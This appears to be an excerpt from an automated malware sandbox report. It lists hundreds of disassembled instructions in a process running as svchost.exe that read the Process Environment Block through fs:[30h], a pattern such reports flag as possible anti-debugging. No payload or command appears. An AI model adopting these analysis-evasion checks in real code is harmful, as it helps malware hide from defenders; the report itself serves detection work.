Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]	1_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]	1_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]	1_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]	1_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]	1_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]	1_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]	1_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]	1_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]	1_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]	1_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]	1_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]	1_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	1_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]	1_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]	1_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]	1_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]	1_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]	1_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]	1_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]	1_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]	1_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]	1_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]	1_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]	1_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]	1_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]	1_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]	1_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]	1_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]	1_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]	1_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]	1_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]	1_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]	1_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]	1_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]	1_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]	1_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]	1_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]	1_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]	1_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]	1_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]	1_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]	1_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]	1_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]	1_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]	1_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]	1_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]	1_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]	1_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]	1_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]	1_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]	1_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]	1_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]	1_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]	1_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]	1_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]	1_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]	1_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]	1_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]	1_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]	1_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]	1_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]	1_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]	1_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]	1_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]	1_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]	1_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]	1_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]	1_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]	1_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]	1_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]	1_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]	1_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]	1_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]	1_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]	1_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]	1_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]	1_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]	1_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]	1_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]	1_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]	1_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]	1_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]	1_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]	1_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]	1_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]	1_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]	1_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]	1_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]	1_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]	1_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]	1_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]	1_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]	1_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]	1_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]	1_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]	1_2_030AEB1D
